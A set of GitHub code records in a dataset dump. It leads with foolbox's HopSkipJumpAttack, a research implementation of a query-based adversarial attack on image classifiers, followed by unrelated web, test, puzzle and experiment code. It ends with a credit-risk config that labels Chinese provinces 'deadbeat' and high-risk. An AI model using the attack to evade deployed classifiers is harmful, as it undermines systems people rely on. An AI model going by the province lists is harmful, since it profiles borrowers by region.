flatten\n\nfrom .base import MinimizationAttack, get_is_adversarial\nfrom .base import get_criterion\nfrom .base import T\nfrom .base import raise_if_kwargs\nfrom .base import verify_input_bounds\nfrom ..distances import l2, linf\n\n\nclass HopSkipJumpAttack(MinimizationAttack):\n \"\"\"A powerful adversarial attack that requires neither gradients\n nor probabilities [#Chen19].\n\n Args:\n init_attack : Attack to use to find a starting points. Defaults to\n LinearSearchBlendedUniformNoiseAttack. Only used if starting_points is None.\n steps : Number of optimization steps within each binary search step.\n initial_gradient_eval_steps: Initial number of evaluations for gradient estimation.\n Larger initial_num_evals increases time efficiency, but\n may decrease query efficiency.\n max_gradient_eval_steps : Maximum number of evaluations for gradient estimation.\n stepsize_search : How to search for stepsize; choices are 'geometric_progression',\n 'grid_search'. 'geometric progression' initializes the stepsize\n by ||x_t - x||_p / sqrt(iteration), and keep decreasing by half\n until reaching the target side of the boundary. 'grid_search'\n chooses the optimal epsilon over a grid, in the scale of\n ||x_t - x||_p.\n gamma : The binary search threshold theta is gamma / d^1.5 for\n l2 attack and gamma / d^2 for linf attack.\n tensorboard : The log directory for TensorBoard summaries. If False, TensorBoard\n summaries will be disabled (default). If None, the logdir will be\n runs/CURRENT_DATETIME_HOSTNAME.\n constraint : Norm to minimize, either \"l2\" or \"linf\"\n\n References:\n .. [#Chen19] Jianbo Chen, Michael I. Jordan, Martin J. Wainwright,\n \"HopSkipJumpAttack: A Query-Efficient Decision-Based Attack\",\n https://arxiv.org/abs/1904.02144\n \"\"\"\n\n distance = l1\n\n def __init__(\n self,\n init_attack: Optional[MinimizationAttack] = None,\n steps: int = 64,\n initial_gradient_eval_steps: int = 100,\n max_gradient_eval_steps: int = 10000,\n stepsize_search: Union[\n Literal[\"geometric_progression\"], Literal[\"grid_search\"]\n ] = \"geometric_progression\",\n gamma: float = 1.0,\n tensorboard: Union[Literal[False], None, str] = False,\n constraint: Union[Literal[\"linf\"], Literal[\"l2\"]] = \"l2\",\n ):\n if init_attack is not None and not isinstance(init_attack, MinimizationAttack):\n raise NotImplementedError\n self.init_attack = init_attack\n self.steps = steps\n self.initial_num_evals = initial_gradient_eval_steps\n self.max_num_evals = max_gradient_eval_steps\n self.stepsize_search = stepsize_search\n self.gamma = gamma\n self.tensorboard = tensorboard\n self.constraint = constraint\n\n assert constraint in (\"l2\", \"linf\")\n if constraint == \"l2\":\n self.distance = l2\n else:\n self.distance = linf\n\n def run(\n self,\n model: Model,\n inputs: T,\n criterion: Union[Criterion, T],\n *,\n early_stop: Optional[float] = None,\n starting_points: Optional[T] = None,\n **kwargs: Any,\n ) -> T:\n raise_if_kwargs(kwargs)\n originals, restore_type = ep.astensor_(inputs)\n del inputs, kwargs\n\n verify_input_bounds(originals, model)\n\n criterion = get_criterion(criterion)\n is_adversarial = get_is_adversarial(criterion, model)\n\n if starting_points is None:\n init_attack: MinimizationAttack\n if self.init_attack is None:\n init_attack = LinearSearchBlendedUniformNoiseAttack(steps=50)\n logging.info(\n f\"Neither starting_points nor init_attack given. Falling\"\n f\" back to {init_attack!r} for initialization.\"\n )\n else:\n init_attack = self.init_attack\n # TODO: use call and support all types of attacks (once early_stop is\n # possible in __call__)\n x_advs = init_attack.run(model, originals, criterion, early_stop=early_stop)\n else:\n x_advs = ep.astensor(starting_points)\n\n is_adv = is_adversarial(x_advs)\n if not is_adv.all():\n failed = is_adv.logical_not().float32().sum()\n if starting_points is None:\n raise ValueError(\n f\"init_attack failed for {failed} of {len(is_adv)} inputs\"\n )\n else:\n raise ValueError(\n f\"{failed} of {len(is_adv)} starting_points are not adversarial\"\n )\n del starting_points\n\n tb = TensorBoard(logdir=self.tensorboard)\n\n # Project the initialization to the boundary.\n x_advs = self._binary_search(is_adversarial, originals, x_advs)\n\n assert ep.all(is_adversarial(x_advs))\n\n distances = self.distance(originals, x_advs)\n\n for step in range(self.steps):\n delta = self.select_delta(originals, distances, step)\n\n # Choose number of gradient estimation steps.\n num_gradient_estimation_steps = int(\n min([self.initial_num_evals * math.sqrt(step + 1), self.max_num_evals])\n )\n\n gradients = self.approximate_gradients(\n is_adversarial, x_advs, num_gradient_estimation_steps, delta\n )\n\n if self.constraint == \"linf\":\n update = ep.sign(gradients)\n else:\n update = gradients\n\n if self.stepsize_search == \"geometric_progression\":\n # find step size.\n epsilons = distances / math.sqrt(step + 1)\n\n while True:\n x_advs_proposals = ep.clip(\n x_advs + atleast_kd(epsilons, x_advs.ndim) * update, 0, 1\n )\n success = is_adversarial(x_advs_proposals)\n epsilons = ep.where(success, epsilons, epsilons / 2.0)\n\n if ep.all(success):\n break\n\n # Update the sample.\n x_advs = ep.clip(\n x_advs + atleast_kd(epsilons, update.ndim) * update, 0, 1\n )\n\n assert ep.all(is_adversarial(x_advs))\n\n # Binary search to return to the boundary.\n x_advs = self._binary_search(is_adversarial, originals, x_advs)\n\n assert ep.all(is_adversarial(x_advs))\n\n elif self.stepsize_search == \"grid_search\":\n # Grid search for stepsize.\n epsilons_grid = ep.expand_dims(\n ep.from_numpy(\n distances,\n np.logspace(-4, 0, num=20, endpoint=True, dtype=np.float32),\n ),\n 1,\n ) * ep.expand_dims(distances, 0)\n\n proposals_list = []\n\n for epsilons in epsilons_grid:\n x_advs_proposals = (\n x_advs + atleast_kd(epsilons, update.ndim) * update\n )\n x_advs_proposals = ep.clip(x_advs_proposals, 0, 1)\n\n mask = is_adversarial(x_advs_proposals)\n\n x_advs_proposals = self._binary_search(\n is_adversarial, originals, x_advs_proposals\n )\n\n # only use new values where initial guess was already adversarial\n x_advs_proposals = ep.where(\n atleast_kd(mask, x_advs.ndim), x_advs_proposals, x_advs\n )\n\n proposals_list.append(x_advs_proposals)\n\n proposals = ep.stack(proposals_list, 0)\n proposals_distances = self.distance(\n ep.expand_dims(originals, 0), proposals\n )\n minimal_idx = ep.argmin(proposals_distances, 0)\n\n x_advs = proposals[minimal_idx]\n\n distances = self.distance(originals, x_advs)\n\n # log stats\n tb.histogram(\"norms\", distances, step)\n\n return restore_type(x_advs)\n\n def approximate_gradients(\n self,\n is_adversarial: Callable[[ep.Tensor], ep.Tensor],\n x_advs: ep.Tensor,\n steps: int,\n delta: ep.Tensor,\n ) -> ep.Tensor:\n # (steps, bs, ...)\n noise_shape = tuple([steps] + list(x_advs.shape))\n if self.constraint == \"l2\":\n rv = ep.normal(x_advs, noise_shape)\n elif self.constraint == \"linf\":\n rv = ep.uniform(x_advs, low=-1, high=1, shape=noise_shape)\n rv /= atleast_kd(ep.norms.l2(flatten(rv, keep=1), -1), rv.ndim) + 1e-12\n\n scaled_rv = atleast_kd(ep.expand_dims(delta, 0), rv.ndim) * rv\n\n perturbed = ep.expand_dims(x_advs, 0) + scaled_rv\n perturbed = ep.clip(perturbed, 0, 1)\n\n rv = (perturbed - x_advs) / atleast_kd(ep.expand_dims(delta + 1e-8, 0), rv.ndim)\n\n multipliers_list: List[ep.Tensor] = []\n for step in range(steps):\n decision = is_adversarial(perturbed[step])\n multipliers_list.append(\n ep.where(\n decision,\n ep.ones(\n x_advs,\n (\n len(\n x_advs,\n )\n ),\n ),\n -ep.ones(\n x_advs,\n (\n len(\n decision,\n )\n ),\n ),\n )\n )\n # (steps, bs, ...)\n multipliers = ep.stack(multipliers_list, 0)\n\n vals = ep.where(\n ep.abs(ep.mean(multipliers, axis=0, keepdims=True)) == 1,\n multipliers,\n multipliers - ep.mean(multipliers, axis=0, keepdims=True),\n )\n grad = ep.mean(atleast_kd(vals, rv.ndim) * rv, axis=0)\n\n grad /= ep.norms.l2(atleast_kd(flatten(grad), grad.ndim)) + 1e-12\n\n return grad\n\n def _project(\n self, originals: ep.Tensor, perturbed: ep.Tensor, epsilons: ep.Tensor\n ) -> ep.Tensor:\n \"\"\"Clips the perturbations to epsilon and returns the new perturbed\n\n Args:\n originals: A batch of reference inputs.\n perturbed: A batch of perturbed inputs.\n epsilons: A batch of norm values to project to.\n Returns:\n A tensor like perturbed but with the perturbation clipped to epsilon.\n \"\"\"\n epsilons = atleast_kd(epsilons, originals.ndim)\n if self.constraint == \"linf\":\n perturbation = perturbed - originals\n\n # ep.clip does not support tensors as min/max\n clipped_perturbed = ep.where(\n perturbation > epsilons, originals + epsilons, perturbed\n )\n clipped_perturbed = ep.where(\n perturbation < -epsilons, originals - epsilons, clipped_perturbed\n )\n return clipped_perturbed\n else:\n return (1.0 - epsilons) * originals + epsilons * perturbed\n\n def _binary_search(\n self,\n is_adversarial: Callable[[ep.Tensor], ep.Tensor],\n originals: ep.Tensor,\n perturbed: ep.Tensor,\n ) -> ep.Tensor:\n # Choose upper thresholds in binary search based on constraint.\n d = int(np.prod(perturbed.shape[1:]))\n if self.constraint == \"linf\":\n highs = linf(originals, perturbed)\n\n # TODO: Check if the threshold is correct\n # empirically this seems to be too low\n thresholds = highs * self.gamma / (d * d)\n else:\n highs = ep.ones(perturbed, len(perturbed))\n thresholds = highs * self.gamma / (d * math.sqrt(d))\n\n lows = ep.zeros_like(highs)\n\n # use this variable to check when mids stays constant and the BS has converged\n old_mids = highs\n\n while ep.any(highs - lows > thresholds):\n mids = (lows + highs) / 2\n mids_perturbed = self._project(originals, perturbed, mids)\n is_adversarial_ = is_adversarial(mids_perturbed)\n\n highs = ep.where(is_adversarial_, mids, highs)\n lows = ep.where(is_adversarial_, lows, mids)\n\n # check of there is no more progress due to numerical imprecision\n reached_numerical_precision = (old_mids == mids).all()\n old_mids = mids\n\n if reached_numerical_precision:\n # TODO: warn user\n break\n\n res = self._project(originals, perturbed, highs)\n\n return res\n\n def select_delta(\n self, originals: ep.Tensor, distances: ep.Tensor, step: int\n ) -> ep.Tensor:\n result: ep.Tensor\n if step == 0:\n result = 0.1 * ep.ones_like(distances)\n else:\n d = int(np.prod(originals.shape[1:]))\n\n if self.constraint == \"linf\":\n theta = self.gamma / (d * d)\n result = d * theta * distances\n else:\n theta = self.gamma / (d * np.sqrt(d))\n result = np.sqrt(d) * theta * distances\n\n return result\n","repo_name":"bethgelab/foolbox","sub_path":"foolbox/attacks/hop_skip_jump.py","file_name":"hop_skip_jump.py","file_ext":"py","file_size_in_byte":13889,"program_lang":"python","lang":"en","doc_type":"code","stars":2569,"dataset":"github-code","pt":"18"} +{"seq_id":"69969637161","text":"#!/usr/bin/env python\nimport json\nimport webapp2\n\n\nclass EntriesHandler(webapp2.RequestHandler):\n def get(self):\n range_start = self.request.get('start')\n range_end = self.request.get('end')\n word = self.request.get('word')\n word = (word if len(word) > 0 else 'Nothing') + ' '\n\n\n result = []\n\n if len(range_start) > 0 and len(range_end) > 0:\n start = int(range_start)\n end = int(range_end)\n\n end = end if end < 500 else 500\n\n for i in range(start, end):\n result.append({'name': word + str(i)})\n\n self.response.headers['Content-Type'] = \"application/json\"\n self.response.out.write(json.dumps(result))\n\n\nclass MainHandler(webapp2.RedirectHandler):\n def get(self):\n self.response.out.write(\"Hello World\")\n\napp = webapp2.WSGIApplication([\n ('/entries', EntriesHandler)\n], debug=True)\n","repo_name":"lepenkinya/infinite-scroll-app-test","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6147182890","text":"from app.models import db, Product, environment, SCHEMA\n\n\ndef seed_products():\n product1 = Product(\n owner_id=1,\n name='Slap On Bracelet',\n description='You slap it on your wrist and boom you have a not so fashionable bracelet',\n price=201.00,\n )\n\n product2 = Product(\n owner_id=2,\n name='Bluetooth Earbuds',\n description='Why would you want wires holding you back when you can just not have them',\n price=799.00\n )\n\n product3 = Product(\n owner_id=3,\n name='Fancy Watch Thing',\n description='It is a watch that will make you look like you make more money than you do',\n price=1799.00\n )\n product4 = Product(\n owner_id=4,\n name='Hold Your Cords Thing',\n description='Never worry about your friends taking your cords anymore',\n price=79.99\n )\n product5 = Product(\n owner_id=5,\n name='A Touch Screen....',\n description='It looks like you can put this in your car?... I dont know buy it and figure it out',\n price=2000.00\n )\n product6 = Product(\n owner_id=6,\n name='A Fancy Device Holder',\n description='It looks absurdly unnecessary, That is why you are going to buy it anyway',\n price=1699.00\n )\n product7 = Product(\n owner_id=7,\n name='Hyper Leg Warmers',\n description='They are so thin they probably will not actually warm your legs... But they look cool!',\n price=89.00\n )\n product8 = Product(\n owner_id=1,\n name='More Earbuds',\n description='These are some more bluetooth earbuds but look at the case they come in! Definitely worth more money!',\n price=999.00\n )\n product9 = Product(\n owner_id=2,\n name='Bluetooth Speaker',\n description='Everything on here might as well be bluetooth, everyone loves that stuff!',\n price=699.00\n )\n product10 = Product(\n owner_id=3,\n name='Bluetooth Knife Sharpener',\n description='This knife sharpener is legit bluetooth! Trust me bro.',\n price=1300.00\n )\n product11 = Product(\n owner_id=4,\n name='Adjustable Magnet',\n description='It looks like a selfie stick, but like, with a magnet on it?',\n price=99.99\n )\n product13 = Product(\n owner_id=7,\n name='Hat and Neck Warmer',\n description='You get both of these bad boys for a fairly reasonable price (reasonable compared to everything here). Stay warm out there party people',\n price=359.00\n )\n product12 = Product(\n owner_id=5,\n name='Stretchy Shoe Cover',\n description='Say goodbye to those nasty disposable shoe covers. There is nothing better than reusing something you stepped in!',\n price=279.00\n )\n product14 = Product(\n owner_id=7,\n name='Night Vision Glasses',\n description='These are apparently night vision glasses. Yeah I dont really believe it either, but the picture says they are.',\n price=779.00\n )\n product15 = Product(\n owner_id=1,\n name='Some Kinda Bracelet',\n description='This is not as cool as the slap on bracelets trust me, but if you want it there is a handy add to cart button on the right',\n price=899.00\n )\n product16 = Product(\n owner_id=2,\n name='A Tablet for Drawing',\n description='Instead of wasting a ton of paper and walls just get your kids to play with this and they wont get bored of it an hour. Trust me bro',\n price=2799.00\n )\n product17 = Product(\n owner_id=3,\n name='4 In 1 Charger',\n description='Charges 4 devices... At the same time! Crazy right? And its totally wireless (except when it needs charged).',\n price=479.00\n )\n product18 = Product(\n owner_id=4,\n name='Bluetooth Knife',\n description='Do not take the picture seriously, you will not be getting one for free. Anyway this baby is totally wireless and can connect to anyone or anything!',\n price=9.99\n )\n product19 = Product(\n owner_id=5,\n name='MP3 Player',\n description='Looks like it has that set of earbuds that hurt your ears after about 10 minutes. If you but this I know that pain',\n price=8621.00\n )\n product20 = Product(\n owner_id=6,\n name='Kylo Rens Charger',\n description='This is definitely a charging cord that someone will \"borrow\" and never give back. It almost reminds me of Kylo Rens lightsaber.',\n price=789.00\n )\n product21 = Product(\n owner_id=6,\n name='Its A Tape Measure',\n description='Its uh... its just a tape measure... Used to.. measure stuff..',\n price=79.49\n )\n product22 = Product(\n owner_id=1,\n name='Bluetooth Insole',\n description='These insoles will take your feet far in life. If your feet get sore like mine do, these new magic insoles will use bluetooth technology to track how much you walk, send it to your phone and tell you to stop walking',\n price=5600.00\n )\n\n db.session.add(product1)\n db.session.add(product2)\n db.session.add(product3)\n db.session.add(product4)\n db.session.add(product5)\n db.session.add(product6)\n db.session.add(product7)\n db.session.add(product8)\n db.session.add(product9)\n db.session.add(product10)\n db.session.add(product11)\n db.session.add(product12)\n db.session.add(product13)\n db.session.add(product14)\n db.session.add(product15)\n db.session.add(product16)\n db.session.add(product17)\n db.session.add(product18)\n db.session.add(product19)\n db.session.add(product20)\n db.session.add(product21)\n db.session.add(product22)\n db.session.commit()\n\n\ndef undo_products():\n if environment == \"production\":\n db.session.execute(f\"TRUNCATE table {SCHEMA}.products RESTART IDENTITY CASCADE;\")\n else:\n db.session.execute(\"DELETE FROM products\")\n\n db.session.commit()\n","repo_name":"Cahzzm/Phish","sub_path":"Phish/app/seeds/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"5070814365","text":"from django.contrib.auth.models import User\nimport json\nimport vcr\n\nfrom .models import Vinculum, RemoteResources, InputOutputPath\nfrom rest_framework.test import APITestCase\nfrom rest_framework import status\n\nfrom serializers import VinculumSerializer\n\n\nclass VinculumSerializeTest(APITestCase):\n\n def setUp(self):\n self.user = User.objects.create_user('testuser', email='testuser@test.com', password='testing')\n self.user.save()\n self.data = {\n \"title\": \"Actual real data\",\n \"root_path\": \"/mjk4\",\n \"remote_resources\": [{\n \"authentication_behavior\": \"none\",\n \"remote_resource_path\": \"https://query.yahooapis.com/v1/public/yql?q=select%20*%20from%20weather.forecast%20where%20woeid%20in%20(select%20woeid%20from%20geo.places(1)%20where%20text%3D%22nome%2C%20ak%22)&format=json&env=store%3A%2F%2Fdatatables.org%2Falltableswithkeys\",\n \"io_paths\": [{\n \"input_path\": \"query.results.channel\",\n \"output_path\": \"yahoo.weather\"\n }]\n }]\n }\n self.data_string = json.dumps(self.data)\n self.data_json = json.loads(self.data_string)\n\n self.remote_resource_path = \"https://query.yahooapis.com/v1/public/yql?q=select%20*%20from%20weather.forecast%20where%20woeid%20in%20(select%20woeid%20from%20geo.places(1)%20where%20text%3D%22nome%2C%20ak%22)&format=json&env=store%3A%2F%2Fdatatables.org%2Falltableswithkeys\"\n\n def _require_login(self):\n self.client.login(username='testuser', password='testing')\n\n def _login_post_vinculum(self, data_to_post=None, cassette=None):\n\n self._require_login()\n\n if data_to_post is None:\n data_to_post = json.loads(self.data_string)\n\n response = self.client.post('/vinculums/', data_to_post, format='json')\n return response\n\n def _helper_deleted_blank_fields(self, field_to_test, post_vinculum):\n # TODO: Move this into a library for just itself\n data_to_post_deleted = self.data_json.copy()\n data_to_post_blank = self.data_json.copy()\n\n data_to_post_deleted.pop(field_to_test)\n response = post_vinculum(data_to_post_deleted)\n self.assertEqual(response.content,\n '{\"%s\":[\"This field is required.\"]}' % field_to_test)\n\n data_to_post_blank[field_to_test] = None\n response = post_vinculum(data_to_post_blank)\n\n self.assertEqual(response.content,\n '{\"%s\":[\"This field may not be null.\"]}' % field_to_test)\n\n def test_was_vinclum_correctly_serialized(self):\n\n response = self._login_post_vinculum()\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n vinculum_id = response.data['id']\n vinculum = Vinculum.objects.get(pk=vinculum_id)\n self.assertTrue(isinstance(vinculum, Vinculum))\n\n serialized_vinculum = VinculumSerializer(vinculum)\n\n # self.assertTrue(serialized_vinculum.is_valid())\n # serialized_vinculum_data = serialized_vinculum.validated_data\n # TODO: Find out why this validated_data is different from just plain old 'data' member\n\n serialized_vinculum_data = serialized_vinculum.data\n\n self.assertEqual(len(self.data_json['remote_resources']),\n len(serialized_vinculum_data['remote_resources'])\n )\n\n self.assertEqual(serialized_vinculum_data['remote_resources'][0]['remote_resource_path'],\n self.remote_resource_path)\n\n self.assertEqual(len(self.data_json['remote_resources'][0]['io_paths']),\n len(serialized_vinculum_data['remote_resources'][0]['io_paths'])\n )\n\n self.assertEqual(serialized_vinculum_data['remote_resources'][0]['io_paths'][0]['input_path'],\n \"query.results.channel\")\n self.assertEqual(serialized_vinculum_data['remote_resources'][0]['io_paths'][0]['output_path'],\n \"yahoo.weather\")\n\n @vcr.use_cassette('test_artifacts/vcr_cassettes/was_vinculum_correctly_stored')\n def test_was_vinculum_correctly_stored(self):\n\n response = self._login_post_vinculum()\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n vinculum_id = response.data['id']\n\n self.assertEqual(Vinculum.objects.count(), 1)\n self.assertEqual(RemoteResources.objects.count(), 1)\n self.assertEqual(InputOutputPath.objects.count(), 1)\n\n remoteresources = RemoteResources.objects.all()[:1].get()\n self.assertEqual(remoteresources.remote_resource_path, self.remote_resource_path)\n self.assertEqual(remoteresources.authentication_behavior, \"none\")\n self.assertEqual(remoteresources.vinculum_id, vinculum_id)\n\n io_paths = InputOutputPath.objects.all()[:1].get()\n self.assertEqual(io_paths.input_path, \"query.results.channel\")\n self.assertEqual(io_paths.output_path, \"yahoo.weather\")\n self.assertEqual(io_paths.remote_resource_id, remoteresources.id)\n\n @vcr.use_cassette('test_artifacts/vcr_cassettes/vinculum_needs_root_path_missing')\n def test_vinculum_needs_root_path(self):\n # Test to see what happens when root_path is missing entirely\n\n field_to_test = 'root_path'\n\n data_to_post_deleted = json.loads(self.data_string)\n\n data_to_post_deleted.pop(field_to_test)\n\n response = self._login_post_vinculum(data_to_post_deleted)\n\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(response.content,\n '{\"%s\":[\"This field is required.\"]}' % field_to_test)\n\n @vcr.use_cassette('test_artifacts/vcr_cassettes/vinculum_needs_root_path_blank')\n def test_vinculum_needs_root_path_not_none(self):\n # what happens if root_path is present but none\n field_to_test = 'root_path'\n\n data_to_post_blank = self.data_json.copy()\n\n data_to_post_blank[field_to_test] = None\n response = self._login_post_vinculum(data_to_post_blank, cassette='test_artifacts/vcr_cassettes/vinculum_needs_root_path_blank')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n self.assertEqual(response.content,\n '{\"%s\":[\"This field may not be null.\"]}' % field_to_test)\n\n self._helper_deleted_blank_fields('root_path',\n self._login_post_vinculum)\n\n @vcr.use_cassette('test_artifacts/vcr_cassettes/vinculum_needs_remote_resources_missing')\n def test_vinculum_needs_remote_resources(self):\n # test to see what happens when remote_resources is missing\n field_to_test = 'remote_resources'\n\n data_to_post_deleted = self.data_json.copy()\n\n data_to_post_deleted.pop(field_to_test)\n response = self._login_post_vinculum(data_to_post_deleted)\n self.assertEqual(response.content,\n '{\"%s\":[\"This field is required.\"]}' % field_to_test)\n\n @vcr.use_cassette('test_artifacts/vcr_cassettes/vinculum_needs_remote_resources_blank')\n def test_vinculum_needs_remote_resources_blank(self):\n # test to see what happens when remote_resources is none\n\n field_to_test = 'remote_resources'\n\n data_to_post_blank = json.loads(self.data_string)\n\n data_to_post_blank[field_to_test] = None\n response = self._login_post_vinculum(data_to_post_blank)\n\n self.assertEqual(response.content,\n '{\"%s\":[\"This field may not be null.\"]}' % field_to_test)\n\n @vcr.use_cassette('test_artifacts/vcr_cassettes/vinculum_is_running')\n def test_vinculum_is_running(self):\n\n response = self._login_post_vinculum()\n vinculum_id = response.data['id']\n vinculum = Vinculum.objects.get(pk=vinculum_id)\n self.assertTrue(isinstance(vinculum, Vinculum))\n\n response = self.client.get('/vinculums/' + str(vinculum_id) + '/running' , format='json')\n\n returned_data = response.json()\n self.assertTrue(response)\n self.assertTrue(response.status_code==200)\n self.assertTrue(returned_data['pk'] == '1')\n self.assertTrue(returned_data['running'] == True)","repo_name":"linearregression/vinculum_control_panel","sub_path":"vinculum/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":8294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36411259309","text":"class Solution:\n def maxAreaOfIsland(self, grid: List[List[int]]) -> int:\n '''\n 跟 200 的思路一样,只是需要注意如何在 dfs 中进行适当的返回\n :param grid:\n :return:\n\n time: O(R*C)\n space: O(R*C)\n R 是行,C 是列\n '''\n def dfs(i, j):\n count = 0\n if 0 <= i < m and 0 <= j < n and grid[i][j] == 1:\n grid[i][j] = 2\n count += 1\n return count + dfs(i + 1, j) + dfs(i - 1, j) + dfs(i, j + 1) + dfs(i, j - 1)\n else:\n return 0\n\n m, n = len(grid), len(grid[0])\n max_count = 0\n for i in range(len(grid)):\n for j in range(len(grid[i])):\n if grid[i][j] == 1:\n count = dfs(i, j)\n max_count = max(count, max_count)\n return max_count\n","repo_name":"cicihou/LearningProject","sub_path":"leetcode-py/leetcode695.py","file_name":"leetcode695.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36192909242","text":"from otree.api import Currency as c, currency_range\nfrom ._builtin import Page, WaitPage\nfrom .models import Constants\nimport os, json, pandas\nimport paramiko, random\n\nclass Alignment_info(Page):\n form_model = 'player'\n form_fields = ['name', 'student_id', 'exp_date']\n\n\nclass Instruction(Page):\n def before_next_page(self):\n pwd = os.getcwd()\n emo_order_file = self.session.config['order_file']\n dscp_file = self.session.config['emo_dscp_file']\n\n folder = 'reference'\n dscp_path = os.path.join(pwd, folder, dscp_file)\n order_path = os.path.join(pwd, folder, emo_order_file)\n\n with open(dscp_path, 'r', encoding='utf-8') as file_object:\n dscp_data = json.load(file_object)\n\n if self.session.config['mode'] == 0:\n order, order_code = order_retrieval(order_path)\n elif self.session.config['mode'] == 1:\n order, order_code = order_retrieval_future(order_path)\n\n emotions = order\n emo_dscp = [dscp_data[i] for i in emotions]\n\n alphas = ['C', 'F']\n random.shuffle(alphas)\n\n self.participant.vars['emotions'] = emotions\n self.participant.vars['emo_dscp'] = emo_dscp\n\n self.participant.vars['alphas'] = alphas\n\n self.player.emo_order = '_'.join(emotions)\n self.player.emo_order_code = order_code\n\n def vars_for_template(self):\n exp_theme = '回忆' if self.session.config['mode'] == 0 else '想象'\n time = self.session.config['time']\n return dict(\n exp_theme=exp_theme,\n time=time\n )\n\n\npage_sequence = [Instruction, Alignment_info]\n\n\ndef order_retrieval(order_path):\n order_data = pandas.read_table(order_path, sep='\\t')\n for i in range(24):\n used = order_data['used'].iloc[i]\n get = used == 0\n if get:\n order_data.iloc[i, 1] = 1\n order = [\n order_data['0'].iloc[i],\n order_data['1'].iloc[i],\n order_data['2'].iloc[i],\n order_data['3'].iloc[i],\n order_data['4'].iloc[i]\n ]\n order_code = order_data['code'].iloc[i]\n break\n continue\n\n order_data.to_csv(order_path, sep='\\t', index=False)\n\n return order, order_code\n\n\ndef order_retrieval_future(order_path):\n order_data = pandas.read_table(order_path, sep='\\t')\n for i in range(108):\n used = order_data['used'].iloc[i]\n get = used == 0\n if get:\n order_data.iloc[i, 1] = 1\n order = [\n order_data['0'].iloc[i],\n order_data['1'].iloc[i],\n order_data['2'].iloc[i]\n ]\n order_code = order_data['code'].iloc[i]\n break\n continue\n\n order_data.to_csv(order_path, sep='\\t', index=False)\n\n return order, order_code\n\n","repo_name":"liufuju/Exp1_mixed","sub_path":"instructions/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17501126900","text":"# -*- coding:utf-8 -*-\n########################################################################################################################\n# 全局配置清单\n########################################################################################################################\n\n\"\"\"\n 全局清单配置\n\n\"\"\"\n\n\"\"\"\n国内省份列表\n\n\"\"\"\n# 省份元组\nPROVINCE_LIST = (u'山东', u'江苏', u'上海', u'浙江', u'安徽', u'福建', u'江西', u'广东', u'广西', u'海南', u'河南',\n u'湖南', u'湖北', u'北京', u'天津', u'河北', u'山西', u'内蒙古', u'宁夏', u'青海', u'陕西', u'甘肃',\n u'新疆', u'四川', u'贵州', u'云南', u'重庆', u'西藏', u'辽宁', u'吉林', u'黑龙江', u'香港', u'澳门',\n u'台湾', u'全国', u'运营商')\n\"\"\"\n中国省份区域划分\n1 ====> 华东地区(包括山东、江苏、上海、浙江、安徽、福建、江西)HD\n2 ====> 华南地区(包括广东、广西、海南)HN\n3 ====> 华中地区(包括河南、湖南、湖北)HZ\n4 ====> 华北地区(包括北京、天津、河北、山西、内蒙古)HB\n5 ====> 西北地区(包括宁夏、青海、陕西、甘肃、新疆)XB\n6 ====> 西南地区(包括四川、贵州、云南、重庆、西藏)XN\n7 ====> 东北地区(包括辽宁、吉林、黑龙江)DB\n8 ====> 港澳台地区(包括香港、澳门、台湾)GAT\n\n\"\"\"\nPROVINCE_MAP_DICT = {u'山东': 1, u'江苏': 1, u'上海': 1, u'浙江': 1, u'安徽': 1, u'福建': 1, u'江西': 1,\n u'广东': 2, u'广西': 2, u'海南': 2,\n u'河南': 3, u'湖南': 3, u'湖北': 3,\n u'北京': 4, u'天津': 4, u'河北': 4, u'山西': 4, u'内蒙古': 4,\n u'宁夏': 5, u'青海': 5, u'陕西': 5, u'甘肃': 5, u'新疆': 5,\n u'四川': 6, u'贵州': 6, u'云南': 6, u'重庆': 6, u'西藏': 6,\n u'辽宁': 7, u'吉林': 7, u'黑龙江': 7,\n u'香港': 8, u'澳门': 8, u'台湾': 8,\n u'全国': 9, u'运营商': 9, u'未知': 9}\n\n# 经济较发达省份 edp\nECONOMICALLY_DEVELOPED_PROVINCES = [u'广东', u'江苏', u'山东', u'浙江', u'四川', u'北京', u'上海']\n# 老赖top 10 省份 dpt\nDEADBEAT_PROVINCES_TOP10 = [u'江苏', u'山东', u'浙江', u'河南', u'广东', u'安徽', u'福建', u'重庆', u'黑龙江', u'四川']\n\n\"\"\"\n发达国家列表 世界公认18个发达国家 ddc\n\n\"\"\"\nDEVELOPED_COUNTRY = [u'美国', u'加拿大', u'日本', u'英国', u'法国', u'德国', u'意大利', u'荷兰', u'比利时', u'卢森堡',\n u'瑞士', u'奥地利', u'挪威', u'瑞典', u'丹麦', u'芬兰', u'澳大利亚', u'新西兰']\n\n\"\"\"\n信用卡逾期高发省份 cc_hrp\n\n1 天津 2 江西 3 重庆 4 四川 5 黑龙江 6 福建\n\n\"\"\"\nCC_HIGH_RISK_PROVINCES = [u'天津', u'福建', u'江西', u'重庆', u'四川', u'黑龙江']\n\n\"\"\"\n用户行为检查特征结果列表 用于结果检查 behavior_check_result_list\n\n\"\"\"\n\nBEHAVIOR_CHECK_TUPLE = ('user_mobile_use_time', 'cpc_user_no_call_days', 'cpc_user_3days_no_call_cnt',\n 'cpc_user_max_silent_days', 'cpc_user_silent_days', 'cpc_user_high_risk_cnt',\n 'cpc_user_high_risk_cnt_ratio', 'user_if_contact_am', 'user_if_contact_110',\n 'user_if_contact_120', 'user_if_contact_lawyer', 'user_if_contact_court',\n 'user_call_night_fre', 'user_call_loan_fre', 'user_call_bank_fre', 'user_call_cc_fre',\n 'user_address_use_in_eb_fre', 'user_eb_use_fre', 